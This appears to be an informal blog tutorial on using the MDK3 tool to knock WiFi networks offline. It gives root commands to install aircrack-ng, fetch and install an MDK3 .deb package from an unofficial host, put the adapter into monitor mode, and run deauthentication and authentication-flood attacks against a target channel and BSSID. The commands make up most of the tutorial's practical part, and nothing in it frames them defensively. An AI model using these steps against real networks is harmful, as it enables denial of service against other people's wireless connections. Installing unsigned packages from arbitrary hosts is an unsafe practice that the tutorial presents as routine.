Today I am going you to show vulnerability in IEEE 802.11 protocol which can be used against a WiFi network to bring it to it's knees with help of a tool named "MDK3" written by Pedr0 Larbig
Firstly what the heck is IEEE 802.11 ?
IEEE stands for Institute of Electrical and Electronics Engineers who created WLAN(wifi) Standard in 1997 and named it 802.11 .There are many version of these standards namely 802.11 a/b/d/e which have their individual advantages and disadvantages.
What are we going to do with it today?
Today we are going to exploit the weakness in these standards with help of a tool named MDK3 which uses methods such as beacon flood mode, deauthenticating connected clients, cracking hidden essids, crashing wireless APs and many more
2)Wifi adapter capable of packet injection
3)Basic Knowledge to install software on linux
Let's Begin by Installation of MDK3 , I will be using Ubuntu 12.04 in this demonstration you can use any linux ditro .
Firstly we'll be needing airmon-ng It comes with aircrack-ng , so we'll install aircrack-ng package
make sure you are root :D
~# apt-get install aircrack-ng
to check if airmon-ng is installed just type
time to install mdk3
Lastest tarballs are available at http://homepages.tu-darmstadt.de/~plarbig/wlan/#mdk3
but for sake of simplicity i will install a deb package of version 6 from Here because it's not present in ubuntu's repo
so we issue the command
~# wget http://selu.ath.cx/debian/pool/main/m/mdk3/mdk36-0.1_amd64.deb
~# dpkg -i mdk*.deb
now let's dump available networks
~# airodump-ng mon0
~# mdk3 --fullhelp
now let's set the cannon :D
~# mdk3 mon0 d -c 11
where the argument of -c is channel of your target you can add blacklist by adding -b <blacklist file>
now open up a new terminal window and type this
~# mdk3 mon0 a -m -i <target bssid>